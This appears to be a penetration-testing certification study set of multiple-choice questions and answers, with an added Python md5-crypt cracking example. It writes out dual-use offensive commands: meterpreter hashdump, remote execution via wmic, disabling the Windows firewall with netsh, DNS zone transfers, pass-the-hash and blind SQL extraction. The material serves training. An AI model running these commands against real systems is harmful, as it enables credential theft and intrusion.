Pen Test Study


Which of the following statements describes the NT hash algorithm? 1. Entire password up to 256 characters hashed using MD4, case is preserved, and hashes are not salted. 2. Passwords less than 15 characters, padded and split into two 7 character passwords, two parts hashed with DES and combined, case is NOT preserved, and hashes are not salted. 3. Passwords are less than 256 characters, padded and split into 128 character passwords, two parts hashed with MD4 and combined, case is preserved, and hashes are not salted. 4. Entire password up to 256 characters hashed using DES, case is preserved, and hashes are salted.

1. Entire password up to 256 characters hashed using MD4, case is preserved, and hashes are not salted. Explanation) The NT algorithm is simultaneously simpler and far stronger than LANMAN. The user's password (as UTF-16LE) is hashed with a straight MD4; passwords of up to 256 characters are supported on modern Windows machines. The NT hash preserves the alphabetic case of the password and does none of LANMAN's upper-casing or splitting. Neither the LANMAN nor the NT hash creation process uses a salt, so identical passwords always produce identical hashes.

Which Regional Internet Registry (RIR) covers North America? 1. ARIN 2. RIPE NCC 3. APNIC 4. LACNIC

1. ARIN. Explanation) ARIN (American Registry for Internet Numbers) covers the United States, Canada and parts of the Caribbean. RIPE NCC covers Europe, the Middle East and Central Asia, APNIC the Asia-Pacific region, and LACNIC Latin America and the rest of the Caribbean.

What tool could you use to capture and crack LANMAN Challenge/Response over a network? 1. Cain 2. John the Ripper 3. Wireshark 4. WinCrack

1. Cain. Explanation) Cain & Abel can both capture LANMAN challenge/response and NTLMv1 authentication exchanges off the network and crack them. John the Ripper cracks NT and other password hashes but includes no sniffer, so it must be paired with another tool to collect the exchanges. WinCrack is password-cracking spyware; finding it on a machine means the machine is infected with malware. It attacks files enciphered with the tool WINCRYPT and does not capture network traffic. Wireshark is a sniffer, but it does not crack passwords by itself.

You have been contracted to analyze an environment for potential weaknesses in physical and network security. Which term correctly classifies this project? 1. Vulnerability Assessment 2. Risk Assessment 3. Security Remediation 4. Penetration Test

1. Vulnerability Assessment. Explanation) A vulnerability assessment identifies and rates weaknesses without exploiting them; a penetration test goes on to exploit the weaknesses it finds to demonstrate real impact.

What section of the penetration test or ethical hacking engagement final report is used to communicate the agreed upon scope of the test? 1. Introduction 2. Conclusions 3. Executive Summary 4. Findings

1. Introduction. Explanation) The introduction component of the report is a one-to-three page section that gives an overview of the project so that the reader understands when the project occurred, what was included in the scope (and, if applicable, items purposely left out of scope), and who participated in the test.

What is the main difference between LANMAN and NTLMv1 challenge/responses? 1. NTLMv1 starts with the NT hash, whereas LANMAN starts with the LANMAN hash 2. NTLMv1 utilizes DES, whereas LANMAN utilizes MD4 3. NTLMv1 splits the hash into three eight-byte pieces, whereas LANMAN splits the hash into three seven-byte pieces 4. NTLMv1 only pads 18 bytes

1. NTLMv1 starts with the NT hash, whereas LANMAN starts with the LANMAN hash. Explanation) Outside of this the two are the same: the 16-byte hash is NUL-padded to 21 bytes, split into three 7-byte DES keys, each key DES-encrypts the 8-byte server challenge, and the three 8-byte results are concatenated into the 24-byte response. Because the third key contains only two real bytes of hash, both constructions are weak regardless of which hash they start from.

What will Nessus do when the "Enable safe checks" configuration setting is enabled? 1. Nessus will not run dangerous plugins 2. Nessus will conduct a test run to ensure that the tool is configured correctly prior to the scan 3. Nessus will run a safety check on the target system 4. Nessus will restrict activity to the local host

1. Nessus will not run dangerous plugins. Explanation) "Enable safe checks" is on by default in Nessus. With it enabled, Nessus skips plugins flagged as potentially harmful to the target, such as checks that could crash a service, and relies on banner and version information instead.

You are a new pen tester looking around in the Metasploit payloads directory and see a directory called singles. What are singles? 1. Payloads that include both functionality and communication bundled together 2. Payloads with a single communication option 3. Payloads that work only one time 4. Payloads with a single functionality

1. Payloads that include both functionality and communication bundled together. Explanation) Singles are stand-alone payloads that include all of the pieces in one module: both the payload's functionality and its communication with the attacker are bundled together. Contrast stagers, which only set up the connection and then pull a larger stage (such as Meterpreter) across it.

A penetration tester wishes to stop the Windows Firewall service on a remote host running Windows Vista. She issues the following commands:
C:\Documents and Settings\Owner>net use Z: \\fileserver\shared /user:Administrator
The command completed successfully.
C:\Documents and Settings\Owner>Z:
Z:\>sc stop MpsSvc
[SC] ControlService FAILED 1062:
The service has not been started.
Z:\>
A check of the remote host indicates that Windows Firewall is still running. Why did the command fail? 1. The sc command needs to be passed the IP address of the target. 2. The user does not have the access level needed to stop the firewall. 3. The remote server timed out and did not complete the command. 4. The kernel prevented the command from being executed.

1. The sc command needs to be passed the IP address of the target. Explanation) Mapping a drive letter to the remote share only authenticates to the file server; sc still talks to the local Service Control Manager unless the remote host is named as its first argument, e.g. sc \\fileserver stop MpsSvc (an IP address works as well). As issued, the command asked the local machine to stop MpsSvc, which is why the remote firewall is untouched.

What is the primary purpose of the following command? $ dig @ns1.sans.org sans.org -t AXFR 1. Transfer the DNS zone 2. Discover the SOA record for sans.org 3. Discover the MX record for sans.org 4. Discover the name server IP address for sans.org 5. Transfer incremental sans.org zone changes to ns1.sans.org

1. Transfer the DNS zone. Explanation) The -t flag specifies the record type to request; AXFR asks the authoritative server ns1.sans.org for a full transfer of every record in the sans.org zone. A correctly configured server only permits zone transfers to its own secondaries, so a successful transfer is itself a finding.

What meterpreter command is used to get the SAM database and its hashes from a target machine? 1. hashdump 2. dumpsam 3. dumphash 4. SAMdump 5. lanmandump

1. hashdump. Explanation) Once the priv extension is loaded (current Meterpreter loads it automatically on Windows), run hashdump to pull the SAM database hashes from the target: meterpreter > hashdump. The output lists each local account as user:RID:LM hash:NT hash:::, ready for a cracker or a pass-the-hash tool. hashdump needs SYSTEM privileges; run getsystem first if the session is running as a lower-privileged user.

What file does John the Ripper store its current state in so that it can resume operation where it left off if it crashes? 1. john.rec 2. john.stat 3. john.sav 4. john.pot

1. john.rec. Explanation) Every ten minutes, John updates a file in its run directory called john.rec, a recovery file in the event of a crash. Also, if you hit CTRL-C while John is running, it will update john.rec before it exits. If you hit CTRL-C twice quickly, John terminates without updating john.rec. When John is invoked, it checks whether a john.rec file is present. If it is, John resumes cracking where it left off, without wasting time on guesses already made the last time it ran (except for up to the last ten minutes before the crash). Cracked passwords themselves go to john.pot.

Which of the following are valid Windows Active Directory authentication protocols? 1. LANMAN challenge/response, NTLMv1, NTLMv2, Microsoft Kerberos 2. LANMAN, NT hashing, NTLMv1, NTLMv2 3. LANMAN, NT Hashing, NTLM, Microsoft Kerberos 4. LANMAN challenge/response, NTLMv1, NTLMv2, NT hashing

1. LANMAN challenge/response, NTLMv1, NTLMv2, Microsoft Kerberos. Explanation) LANMAN and NT hashes are password representations stored in the SAM database and in Active Directory; they are not authentication protocols. For authentication across the network, Windows uses a variety of challenge-response protocols derived from those hashes, namely LANMAN challenge/response, NTLMv1 and NTLMv2, as well as Microsoft Kerberos.

When pen testing a network you compromise a switch with a simple password string attack and begin a network packet capture. Which is the best way to analyze the VoIP traffic that you captured on the system? 1. Redirect all VoIP traffic to your workstation and use a VoIP client such as Ekiga or Jphone to replay the traffic. 2. Export the pcap file from the switch to your workstation and convert the file using Cain. 3. Capture the VoIP packets using boolean filters and import the pcap file into a media player like Windows Media Player or QuickTime. 4. Install a switch-based sniffer to capture traffic and filter the packets using the command "debug ip packet detailed".

2. Export the pcap file from the switch to your workstation and convert the file using Cain. Explanation) Cain can convert the captured RTP audio in the pcap to a .wav file for replay in a media player. Boolean filters do not change the output format: a filtered capture is still a pcap, which media players cannot play. Redirecting the traffic to a machine running a VoIP client would terminate the original conversation, and those clients do not record calls. On Linux, an application such as Audacity could record the sound card output.

You have obtained the following hash from the /etc/shadow file. What are you able to discern simply by looking at this hash? - $1$uWeOhL6k$A4XDsB4COGqWaEpFjLLDe. 1. A4XDsB4COGqWaEpFjLLDe. is an SHA1 hash that was created using the salt uWeOhL6k 2. A4XDsB4COGqWaEpFjLLDe. is an MD5 hash that was created using the salt uWeOhL6k. 3. A4XDsB4COGqWaEpFjLLDe. is an SHA1 hash that was created using the salt $1$uWeOhL6k$ 4. A4XDsB4COGqWaEpFjLLDe. is an MD5 hash that was created using the salt $1$uWeOhL6k$

2. A4XDsB4COGqWaEpFjLLDe. is an MD5 hash that was created using the salt uWeOhL6k. Explanation) The leading $1$ identifies the md5-crypt scheme. The salt is the text between the second and third dollar signs, so the salt in this example is uWeOhL6k; the $1$ prefix is the scheme identifier, not part of the salt. The actual hash consists of the remaining 22 characters after the third dollar sign, A4XDsB4COGqWaEpFjLLDe. in this example. glibc's crypt has no SHA-1 scheme; SHA-256 crypt is represented by $5$ and SHA-512 crypt by $6$, while $2a$/$2b$/$2y$ denote bcrypt and $y$ yescrypt.
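
The card above as an added example, not code from the original study set: a parser that splits modular-crypt strings into scheme, parameters, salt and hash (so a tester feeds a cracker the right salt), plus a re-implementation of Poul-Henning Kamp's md5-crypt ($1$) to show how the salt is mixed in and why the same password yields different hashes under different salts. The wordlist and the second and third shadow entries are constructed for the example; the first entry is the one on the card, whose password is unknown.

```python
import hashlib
import hmac
from typing import Dict, Optional

# crypt(3) scheme identifiers a tester meets in /etc/shadow
SCHEMES = {"1": "md5-crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256-crypt", "6": "sha512-crypt", "y": "yescrypt"}
_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def parse_crypt(entry: str) -> Dict[str, str]:
    """Split a modular-crypt string into its fields. For '$1$uWeOhL6k$A4XD...' the salt is
    uWeOhL6k alone: '$1$' is the scheme identifier, not part of the salt."""
    if not entry.startswith("$"):
        # traditional DES crypt: 2-char salt followed by 11 hash chars
        return {"scheme": "", "algorithm": "descrypt", "params": "", "salt": entry[:2], "hash": entry[2:]}
    fields = entry.split("$")[1:]
    scheme = fields.pop(0)
    params = ""
    if scheme.startswith("2"):
        # bcrypt: $2b$cost$ then 22 salt chars immediately followed by 31 hash chars
        params = fields.pop(0)
        rest = fields.pop(0) if fields else ""
        salt, digest = rest[:22], rest[22:]
    else:
        if scheme in ("5", "6") and fields and fields[0].startswith("rounds="):
            params = fields.pop(0)      # optional rounds=N for sha256/sha512-crypt
        elif scheme == "y" and len(fields) > 2:
            params = fields.pop(0)      # yescrypt puts its cost parameters first
        salt = fields[0] if fields else ""
        digest = fields[1] if len(fields) > 1 else ""
    return {"scheme": scheme, "algorithm": SCHEMES.get(scheme, "unknown"),
            "params": params, "salt": salt, "hash": digest}


def _to64(v: int, n: int) -> str:
    """crypt's base64 variant: 6 bits per character, least significant bits first."""
    return "".join(_ITOA64[(v >> (6 * i)) & 0x3F] for i in range(n))


def md5_crypt(password: str, salt: str) -> str:
    """md5-crypt ($1$), re-implemented for illustration. The salt enters the digest in the
    very first step and in most of the 1000 fixed rounds, so precomputed tables for one
    salt are useless against another."""
    pw = password.encode()
    salt = salt.split("$")[0][:8]           # at most 8 chars, terminated by '$'
    sb = salt.encode()
    ctx = hashlib.md5(pw + b"$1$" + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for pl in range(len(pw), 0, -16):
        ctx.update(alt[:min(pl, 16)])
    i = len(pw)
    while i:                                # one byte per bit of the password length
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                   # fixed cost: no rounds= parameter exists for $1$
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    digest = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4) + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
              + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4) + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
              + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4) + _to64(f[11], 2))
    return "$1$" + salt + "$" + digest


def check_md5_crypt(password: str, entry: str) -> bool:
    """Verify a candidate against a $1$ shadow entry (constant-time comparison)."""
    p = parse_crypt(entry)
    if p["algorithm"] != "md5-crypt":
        raise ValueError("not an md5-crypt entry")
    return hmac.compare_digest(md5_crypt(password, p["salt"]), entry)


def dictionary_attack(entry: str, wordlist) -> Optional[str]:
    """Each candidate must be re-hashed with the entry's own salt; that is the whole point of salting."""
    for word in wordlist:
        if check_md5_crypt(word, entry):
            return word
    return None


if __name__ == "__main__":
    print(parse_crypt("$1$uWeOhL6k$A4XDsB4COGqWaEpFjLLDe."))       # the card's hash
    demo = md5_crypt("password", "uWeOhL6k")                      # constructed entry
    print(demo, dictionary_attack(demo, ["123456", "letmein", "password"]))
```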

Which of the following best describes a client side exploit? 1. Attack of a service listening on a client system 2. Attack of a client application that retrieves content from the network 3. Attack on the physical machine 4. Attack that escalates user privileges to root or administrators

2. Attack of a client application that retrieves content from the network. Explanation) Client-side exploits target applications such as browsers, document readers and mail clients by feeding them malicious content; because the victim initiates the connection, inbound filtering at the perimeter does not stop the attack.

You are pen testing using Metasploit and have just started msfd. What limitation does msfd have that you must beware of? 1. Only allows one instance of Metasploit to connect 2. Does not provide a method of authentication 3. Only runs on the loopback interface 4. Picks a random TCP port at startup

2. Does not provide a method of authentication. Explanation) msfd provides neither authentication nor encryption, so anyone who can reach its TCP port gets a full Metasploit console; expose it only on an interface or tunnel you control.

While executing an Nmap NSE scan of a target network, the objective of the scan is to avoid leaving logs or otherwise impacting the target network. Which category of Nmap scripts should be avoided? 1. Safe 2. Intrusive 3. Discovery 4. Malware

2. Intrusive. Explanation) Scripts in the intrusive category may leave log entries, guess passwords, crash services or otherwise impact the target, so they are the ones to avoid. Safe scripts are designed not to; discovery scripts perform read-only enumeration; malware scripts check whether the host is already infected or backdoored.

What is the main difference between LANMAN challenge/response and NTLMv1? 1. NTLMv1 does not split the hash into 3 seven character pieces like LANMAN does. 2. NTLMv1 begins by using NT hashing instead of LANMAN hashing 3. NTLMv1 hash does not need padding before being split into 3 pieces like LANMAN does. 4. NTLMv1 uses a 16 bit hash instead of the 14 bit hash that LANMAN uses.

2. NTLMv1 begins by using NT hashing instead of LANMAN hashing. Explanation) The rest of the computation (padding the 16-byte hash to 21 bytes, splitting it into three 7-byte DES keys and encrypting the server challenge with each) is identical, so NTLMv1 inherits the weaknesses of that construction even though it starts from the stronger hash.

What is the purpose of the following command? C:\> wmic /node:[targetIP] /user:[admin_user] /password:[password] process call create [command] 1. Creating a service on a remote Windows machine 2. Running a command on a remote Windows machine 3. Listing the running processes on a remote Windows machine 4. Creating an admin account on a remote Windows machine

2. Running a command on a remote Windows machine. Explanation) wmic connects to the WMI service on the host given by /node: with the supplied credentials and asks the Win32_Process class to create a new process. Only the process ID and a return value come back, not the command's output, so redirect output to a file or share if you need to read it.

Analyze the command output below. Based on the output, what conclusion can correctly be made about the target?
Starting Nmap 4.54 ( http://insecure.org ) at 2010-09-30 18:39 EDT
Interesting ports on 192.168.116.9:
PORT     STATE SERVICE VERSION
8181/tcp open  unknown
1. This target host is running a version of Linux. 2. The service running on 8181/tcp is not recognized. 3. The service running on 8181/tcp did not complete a handshake. 4. The target host is filtering access to 8181/tcp

2. The service running on 8181/tcp is not recognized. Explanation) The port is open (the handshake completed), but SERVICE reads unknown and VERSION is empty: none of Nmap's service probes matched, so the protocol behind 8181/tcp must be identified by hand, for instance by connecting with netcat.

Examine the contents of the robots.txt file below. Which of the following describes the findings?
# go away
User-agent: *
Disallow: /
1. Files within the user-agent directory are restricted 2. The site does not support web crawlers 3. The site logs user agent data 4. The file prohibits access to the root web folder

2. The site does not support web crawlers. Explanation) User-agent: * addresses every crawler and Disallow: / asks them to index nothing. robots.txt is purely advisory: it restricts access to nothing, and a tester reads it mainly for the paths a site would rather keep out of search engines.

You are conducting a penetration test of a company's web servers and would like a tool that includes a GUI and the ability to look for common errors and problems that you could find with a search engine such as google. Which web application scanning tool could you use to accomplish this? 1. Enum 2. Wikto 3. Nikto 4. N-Stalker

2. Wikto. Explanation) Wikto provides Nikto-style scanning from within a Windows GUI, adding in Google vulnerability scanning.

An analyst runs netstat and records the following network connection from host 10.10.1.25. What can be inferred from this information? CLOSED 2017-06-07 01:00:59z 10.10.1.25 0 195.22.009.061 0 1. 195.242.009.061 has attempted at least one failed connection to host 10.10.1.25 2. Host 10.10.1.25 is on a network that blocks ICMP messages 3. 10.10.1.25 has made at least one successful connection to external host 195.242.009.061 4. External host 195.242.009.061 was blocked by a firewall

3. 10.10.1.25 has made at least one successful connection to external host 195.242.009.061. Explanation) If a connection appears in netstat's output, the TCP handshake completed at some point, so 10.10.1.25 did reach the external host. A CLOSED state only tells us the connection has since ended, not that it was refused or blocked.

Which single tool could you use to crack all of the password hashes below? - LanMan challenge-response - APOP-MD5 - VNC-3DES - CRAM-MD5 - Oracle 1. Aircrack 2. NC 3. Cain 4. John the Ripper

3. Cain. Explanation) Cain's cracker covers all of the listed formats in one tool. Aircrack-ng targets Wi-Fi keys and nc (netcat) is not a password cracker at all.

What difference would you expect to result from running the following commands: (1) $ dig @ns.domain.com target.com -t AXFR and (2) $ dig @ns.domain.com target.com -t IXFR=10022200301 1. Command (1) will display all information about a domain and command (2) will only provide 10022200301 bytes of information 2. Command (1) will display incremental information about a domain and command (2) will provide only 10022200301 bytes of information 3. Command (1) will display all information about a domain and command (2) will provide only incremental updates from SOA 10022200301 4. Command (1) will display information about a domain from the last time the command was issued and command (2) will provide only incremental updates from SOA 10022200301

3. Command (1) will display all information about a domain and command (2) will provide only incremental updates from SOA 10022200301. Explanation) AXFR requests the whole zone; IXFR=serial tells the server the SOA serial number the client already holds and asks only for the changes made since, which is how secondaries stay in sync. A server that does not keep incremental history answers an IXFR with a full transfer instead.

During a pen test you have acquired a file called pix.dump. This file appears to be the output of the "show run" command, which dumps the running configuration of the firewall. You notice the line below and suspect that the administrators have used a common term as a password. enable password 8Rlksdjfoajwfojawfifjawofj Which of the following techniques could be used to unmask the password? 1. The output of the "show run" command on a PIX displays the clear text password by default instead of obfuscating it with "****" 2. The unhiding feature of Cain's GUI-based application can be used to display the original password 3. Compare the output to a list of commonly used terms within the organization using Cain's password hashing module 4. Convert the password back to ASCII text by entering the string into a decoding application such as fgdump

3. Compare the output to a list of commonly used terms within the organization using Cain's password hashing module. Explanation) There are times during a penetration test when an educated guess is worthwhile. Building a list of terms commonly used within the organization and running them through Cain's hash generator to see whether any produce the same value is one way to recover device passwords. A recovered password can then be tried against other devices, and the compromised device itself can serve as a pivot point for further scanning.

Analyze the excerpt from a packet capture below. Given the host is up, what conclusion can be correctly drawn about host 192.168.116.101? 1. It is providing services only on port 139/tcp 2. It is resetting connection attempts on tcp ports 130-140. 3. It is not responding to connection attempts on tcp ports 130-140 4. It is redirecting traffic on behalf of another host

3. It is not responding to connection attempts on tcp ports 130-140. Explanation) The packet capture shows a scan directed at 192.168.116.101 on ports 130-140. The connection requests receive no response at all: no SYN-ACK and no RST. The host may be unable or unwilling to answer; in this case the ports are being filtered and the packets silently dropped, which Nmap would report as filtered rather than closed.

Which of the following is a benefit of a pass-the-hash attack over traditional password attacks? 1. No alteration of the LSASS process 2. No triggering of IDS signatures by the attack 3. No account lockout

3. No account lockout. Explanation) Pass-the-hash will not lock out the user account because the attacker slips the hash directly into the LSASS process rather than submitting guesses; the privilege level is that of the compromised hash, and the attack can use native Windows file and print sharing tools to gather information on the system. Intrusion detection systems have both signatures and protocol anomaly detection engines that can be configured to detect the use of tools such as psexec and to monitor for abnormal traffic on well-known ports, so signatures may well fire. Finally, LSASS is not corrupted to the point where it fails, but technically the process is altered when the hash is written into its memory space.

You are pen testing a network and client-side testing is within scope. The system administrators do not want you to start testing until they have patched the systems you will be pen testing. Will waiting result in a valid pen test? 1. Yes, you want to find as few vulnerabilities as possible when pen testing 2. No, patching will increase the number of false positives 3. No, to make an accurate assessment of the risk you need to examine representative systems 4. Yes, patching will reduce the number of false positives.

3. No, to make an accurate assessment of the risk you need to examine representative systems. Explanation) The test is meant to measure the risk the organization actually carries; systems patched specially for the test misrepresent it. Patching mid-engagement also muddies the results, since findings from before and after the patch no longer agree.

Which of the following describes the pass-the-hash attack? 1. Password authentication is achieved by injecting code into the system authentication process (LSASS) causing it to crash. 2. Password hashes are inserted into the user input fields and are processed by LSASS. 3. Password authentication is bypassed by injecting a stolen password hash directly into the systems authentication process (LSASS) 4. Password hashes are captured and decrypted offline and the clear text results are inserted into the LSASS authentication fields.

3. Password authentication is bypassed by injecting a stolen password hash directly into the systems authentication process (LSASS)

How is the SQL function 'substring' used? 1. Search results from a query are concatenated to save bandwidth on the network 2. This command is installed during a penetration test through blind SQL injection 3. This standard database subsystem populates text strings in the metadata 4. Specific search results can be trimmed down to a specified position and length.

4. Specific search results can be trimmed down to a specified position and length. Explanation) SUBSTRING(value, start, length) returns part of a string. In blind SQL injection it lets the attacker test one character of a value at a time, for example by comparing SUBSTRING(password, 1, 1) against candidate characters, and reconstruct the whole value from a series of yes/no answers.

Which of the following penetration testing methodologies, written by Toggmeister and Lee Lawson, provides step-by-step guides that include almost every aspect of penetration testing? 1. Open Web Application Security Project (OWASP) Testing Guide 2. Open Source Security Testing Methodology Manual (OSSTMM) 3. Penetration Testing Framework 4. NIST Special Publication 800-42: Guideline on Network Security Testing

3. Penetration Testing Framework. Explanation) The Penetration Testing Framework by Toggmeister and Lee Lawson is a web site that provides a step-by-step walk-through of every aspect of a network penetration test, naming very specific tools (with links to each one) and the individual commands to use for each tool.

Which of the following is possible in some SQL injection vulnerabilities on certain types of databases that affects the underlying server OS? 1. Data query capabilities 2. Database structure retrieval 3. Shell command execution 4. Data manipulation

3. Shell command execution. Explanation) Some database engines expose operating-system command execution to SQL, most famously Microsoft SQL Server's xp_cmdshell (disabled by default on current versions); an injection point running with sufficient database privileges then becomes a foothold on the server itself.

Which of the following TCP packet sequences are common during a SYN (or half open) scan? 1. The scanning computer sends SYN-ACK and no response is received from the target computer 2. The scanning computer sends SYN and SYN-FIN is received from the target computer 3. The scanning computer sends SYN and the target computer responds with RST-ACK 4. The scanning computer sends SYN-ACK and the target computer responds with RST-ACK

3. The scanning computer sends SYN and the target computer responds with RST-ACK. Explanation) A half-open scan can produce any of the following sequences:
- scanner sends SYN, target responds RST-ACK (closed port; the ACK flag is set but often goes unmentioned)
- scanner sends SYN, target responds SYN-ACK (open port; the scanner then sends RST instead of completing the handshake, which is what makes the scan "half open")
- scanner sends SYN, target or an intermediate device responds with an ICMP unreachable error (Nmap reports the port as filtered)
- scanner sends SYN, no response at all (packet dropped; also reported as filtered)
The scanner never sends SYN-ACK first, and a SYN-FIN reply is not a legitimate TCP response.

A penetration tester successfully adds a directory to the %PATH% on a windows system. Which of the following situations can result from this change? 1. Windows System File Checker will detect the modification 2. The change will cause the system to boot into safe mode 3. The victim could execute the attackers version of an application 4. Windows will not be able to locate the system binaries

3. The victim could execute the attacker's version of an application. Explanation) Windows searches %PATH% in order when a command is typed without a full path, so a malicious binary with the same name as a common tool, placed in a directory that appears earlier in %PATH% than the legitimate one, runs instead of the real program.

Which of the following best explains why you would want to clear the browser state (history, cache, and cookies) between examinations of web servers when you've been trapping and altering values with a non-transparent proxy? 1. Trapping and changing response values is beneficial for web site testing, but using the same cached values in your browser will prevent you from being able to change those values. 2. Values trapped and stored in the browser will reveal the techniques you've used to examine the web servers. 3. Values trapped and changed in the proxy, such as cookies, will be stored by the browser and may impact further testing. 4. Trapping and changing response values is beneficial for web site testing but will cause browser instability if not cleared.

3. Values trapped and changed in the proxy, such as cookies, will be stored by the browser and may impact further testing. Explanation) Clearing the browser state ensures you start with a clean slate. If you change a cookie or another value and come back to test the site later, you could easily forget that the browser still holds the altered value, skewing your findings or further testing. An altered value stored in your browser might reveal a single value you used, but that is not the main reason to clear browser state, and your machine and browser cache are under your control anyway. Cached browser values do not reduce your ability to change values in a REQUEST trap before they are sent to the server, and altered cookies cause no browser instability.

You are pen testing a Windows system remotely via a raw netcat shell. You are searching for text files containing the text "hACKed". What command could you use to find all files in the \temp directory that contain the text "hACKed"? 1. find \temp\*.txt | search nocase("hacked") 2. type \temp\*.text | find "hacked" 3. type \temp\*.txt | find /i "hacked" 4. find \temp\*.txt | grep "hacked"

3. type \temp\*.txt | find /i "hacked". Explanation) type prints the contents of every .txt file in \temp and find /i searches that output case-insensitively, so "hACKed" matches. Without /i, find is case-sensitive, and grep does not exist on a stock Windows host; findstr /i "hacked" \temp\*.txt would also work and names the matching file.

You are running a vulnerability scan on a remote network and the traffic is not making it to the remote target system. You investigate the connection issue and determine that the traffic is not even making it to the internal interface of your local network firewall. What is the most likely problem? 1. Your network firewall is blocking the traffic 2. The remote site you are testing is blocking the traffic 3. Your ISP is blocking the traffic 4. A host based firewall is blocking the traffic 5. The NAT or PAT tables on your network based firewall are filling up and dropping the traffic

4. A host based firewall is blocking the traffic. Explanation) Since the traffic never reaches the internal interface of the network firewall, neither that firewall, the ISP nor the remote site can be responsible; the only component left between the scanner and the network is a host-based firewall on the scanning machine itself.

What defense may be used to prevent Cross Site Request Forgery (XSRF) attacks? 1. Use HTTPS 2. Use a static POST variable 3. Disable persistent cookies 4. Implement CAPTCHA systems

4. Implement CAPTCHA systems. Explanation) Though CAPTCHA systems inconvenience users, the required human interaction is a valid defense against XSRF because the forged request cannot supply the CAPTCHA answer. HTTPS does not help: the browser attaches the victim's cookies to the forged request over TLS just the same. Disabling persistent cookies does not help either, since the attack works whenever the victim has a live session, persistent or not. XSRF is most often delivered through GET parameters, but a crafted auto-submitting form works over HTTP POST as well, and a static POST variable is no defense because the attacker can read it from the public page and embed it; the usual token defense relies on an unpredictable, per-session value the attacker cannot know.

Which of the following applications would be vulnerable to a service-side exploit? 1. Outlook 2. Firefox 3. Adobe Acrobat 4. Internet Information Services

4. Internet Information Services. Explanation) Service-side exploits attack a service that is listening on the network. IIS (Internet Information Services) is the only server application listed; Outlook, Firefox and Adobe Acrobat are client applications that would be targeted by client-side exploits instead.

Which of these classes of tools is best suited for finding vulnerabilities in a web application that was built by a client's in-house developers? 1. Automated vulnerability scanner (like Nessus) 2. Scriptable port scanner (like nmap) 3. Automated web application scanner (like nikto) 4. Non-transparent web proxy (like ZAP)

4. Non-transparent web proxy (like ZAP). Explanation) Nikto is designed to scan for common flaws in the underlying web server and in well-known software installed on top of it; it knows nothing about custom application logic. Nmap and Nessus have limited abilities to scan web applications but are not designed for that kind of work. ZAP and other web proxies, however, give a penetration tester full control over every part of the request sent to the web server, allowing an experienced tester to attack any application, no matter who built it or how it is deployed.

What kind of specific information may be discovered by querying the metadata of a database? 1. System health and memory usage 2. Available shell commands 3. Web application firewall settings 4. Table and column information

4. Table and column information. Explanation) The metadata is information that describes the database itself and the data that it stores. In other words, the metadata tells us the names of the tables and their columns, among other things.

While performing a web application assessment, you start to analyze a Base64 encoded authorization cookie. How could you take a closer look at this encoded element if OWASP ZAP was your only available tool? 1. The information gathering plugins could be used to discover the cookie's authorization algorithm. 2. The b64_decode() function could be scripted to trap the encoded cookie value upon each new request. 3. The manual request editor could be used to launch an automated analysis of the encoded cookie value. 4. The hash calculator could be used to decode, modify, then re-encode the cookie value.

4. The hash calculator could be used to decode, modify, then re-encode the cookie value. Explanation) ZAP's Encode/Decode/Hash tool is immensely useful when analyzing responses from a web site. For example, suppose a cookie comes back every time the user authenticates. The tester can URL- or Base64-decode the cookie's value to see whether it is meaningful, edit it, and re-encode it with a single click.

You've been asked to test a non-transparent proxy to make sure it is working. After confirming the browser is correctly pointed at the proxy, you try to browse a web site. The browser indicates it is "loading" but never displays any part of the page. Checking the proxy, you see a valid request in the proxy from your browser. Checking the response to the proxy, you see the results displayed in the accompanying screenshot (not reproduced here). Which of the following answers is the most likely reason the browser hasn't displayed the page yet? 1. The proxy is likely hung and must be restarted. 2. The proxy is configured to trap responses. 3. The site you are trying to reach is currently down. 4. The proxy is configured to trap requests. 5. The site cannot be accessed through a proxy.

2. The proxy is configured to trap responses. Explanation) Non-transparent proxies typically provide the ability to trap both requests and responses so that data can be viewed and altered. The request was seen by the proxy, so we know it went out, and since the proxy also holds a response, we know the server answered. If a trap were set on requests, the trap would have to be acknowledged before the request went out to the server, so no response would be visible yet. With a trap set on responses, the proxy holds the response but does not forward it to the browser until the trap is acknowledged, which is exactly what is observed. If the site were down, not reachable through the proxy, or the proxy were hung, no server response would appear in the proxy at all.

You are performing a penetration test on a web application using ZAP. After logging in with a valid account you analyze the cookie and see that it shows your username as "cmfuzg9sjfsjfalsjdfljaf=". You wish to replace your username with a different valid username. Explain the process for replacing the username. 1. Use ZAP's Active Scan function with the XSS plug-in enabled to gather cookies from other web site users, then use the cookies gathered in your attack 2. Replace the username in your cookie with a different valid username; when you send the cookie back to the server it will automatically encode the username correctly 3. Use ZAP's Brute Force function to have it create cookies with possible valid usernames and use a script to submit them to the website one at a time to identify more usernames 4. Use ZAP's Encode/Decode/Hash function to determine the type of encoding being used, then encode a different valid username using the same encoding and replace the value in your cookie

4. Use ZAP's Encode/Decode/Hash function to determine the type of encoding being used, then encode a different valid username using the same encoding and replace the value in your cookie. Explanation) The trailing "=" is Base64 padding, a strong hint that the cookie is merely encoded rather than encrypted or signed. If the server accepts the substituted value, authorization rests entirely on a client-controlled cookie, which is the finding to report.

Which JavaScript property is used to read and write the cookies of the current page? 1. window.cookie 2. browser.cookie 3. session.cookie 4. document.cookie

4. document.cookie. Explanation) document.cookie exposes the cookies the browser holds for the page to any script running in it, which is why a cross-site scripting payload can steal a session cookie unless the cookie is flagged HttpOnly.

You are pen testing a Windows system remotely via a raw netcat shell. You have determined that the built-in Windows firewall is blocking your inbound FTP file transfer. What command would you use to disable the Windows firewall? 1. netsh firewall disable 2. ipconfig firewall set off 3. net advfirewall set opmode disable 4. netsh advfirewall set allprofiles state off

4. netsh advfirewall set allprofiles state off. Explanation) This command turns off the built-in Windows firewall for the domain, private and public profiles; it requires an administrative shell. The older syntax on Windows XP and Server 2003 was netsh firewall set opmode disable.

